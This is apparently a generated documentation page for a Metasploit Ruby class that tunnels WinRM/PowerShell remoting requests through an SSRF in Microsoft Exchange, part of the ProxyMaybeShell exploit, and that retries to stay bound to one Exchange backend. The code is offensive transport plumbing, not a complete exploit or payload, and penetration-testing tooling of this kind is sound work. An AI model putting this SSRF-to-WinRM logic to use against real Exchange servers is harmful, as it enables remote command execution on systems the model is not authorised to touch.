Class: Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell::SSRFWinRMConnection::TransportFactory::HttpSsrf

Inherits:
WinRM::HTTP::HttpTransport
  • Object
Defined in:
lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb

Instance Attribute Summary

Instance Method Summary

Constructor Details

#initialize(endpoint, options) ⇒ HttpSsrf

rubocop:disable Lint/



# File 'lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb', line 131

# Builds the transport around a caller-supplied request callable.
#
# The parent class constructor is not invoked: there is no `super` call in
# this body.
#
# @param endpoint [String, URI] WinRM endpoint; a String is run through
#   URI.parse, any other object is stored unchanged
# @param options [Hash] reads :ssrf_proc (stored as given) and
#   :max_backend_retries (defaults to 10 when the key is absent)
def initialize(endpoint, options)
  @endpoint =
    case endpoint
    when String then URI.parse(endpoint)
    else endpoint
    end
  @ssrf_proc = options[:ssrf_proc]

  # Backend target the session is bound to. A PSRP session has to keep
  # talking to one backend, which is relevant when an Exchange Database
  # Availability Group (DAG) is in use. Unset until a request succeeds.
  @backend = nil

  # One initial attempt plus the configured retries, never fewer than one.
  retry_budget = options.fetch(:max_backend_retries, 10)
  @max_backend_attempts = [retry_budget + 1, 1].max
end

Instance Attribute Details

#backend ⇒ Object (readonly)

Returns the value of attribute backend.



# File 'lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb', line 160

# Read-only accessor for the backend target this transport is bound to.
#
# The value starts as nil (set in the constructor) and is filled in by
# send_request from the X-CalculatedBETarget header of the first 200 response.
#
# @return [Object, nil] the recorded header value, or nil if none was recorded
def backend
  @backend
end

Instance Method Details

#send_request(message) ⇒ Object



# File 'lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb', line 140

# Sends one WinRM SOAP message through the configured request callable and
# returns the parsed response.
#
# The POST is repeated, up to @max_backend_attempts times in total, while the
# reply is a 500 whose X-CalculatedBETarget header differs from the value held
# in @backend. The first 200 reply seen while @backend is still nil records
# its X-CalculatedBETarget value, so later calls compare against it.
#
# NOTE(review): inside the loop the reply is dereferenced without a nil
# check, although the later check uses `&.`. If the callable can return nil
# this raises NoMethodError; confirm against the callable's contract.
#
# @param message [Object] request body, passed to the callable as :data
# @return [Object] result of WinRM::ResponseHandler#parse_to_xml for the
#   last reply received
def send_request(message)
  reply = nil
  @max_backend_attempts.times do
    reply = @ssrf_proc.call(
      'POST',
      @endpoint.path,
      { ctype: 'application/soap+xml;charset=UTF-8', data: message }
    )

    # Only a 500 reported for a backend other than the recorded one is
    # repeated; any other reply ends the loop.
    answered_elsewhere = reply.code == 500 && reply.headers['X-CalculatedBETarget'] != @backend
    break unless answered_elsewhere
  end

  # Record the backend once, from the first successful reply.
  @backend = reply.headers['X-CalculatedBETarget'] if reply&.code == 200 && @backend.nil?

  WinRM::ResponseHandler.new(reply.body, reply.code).parse_to_xml
end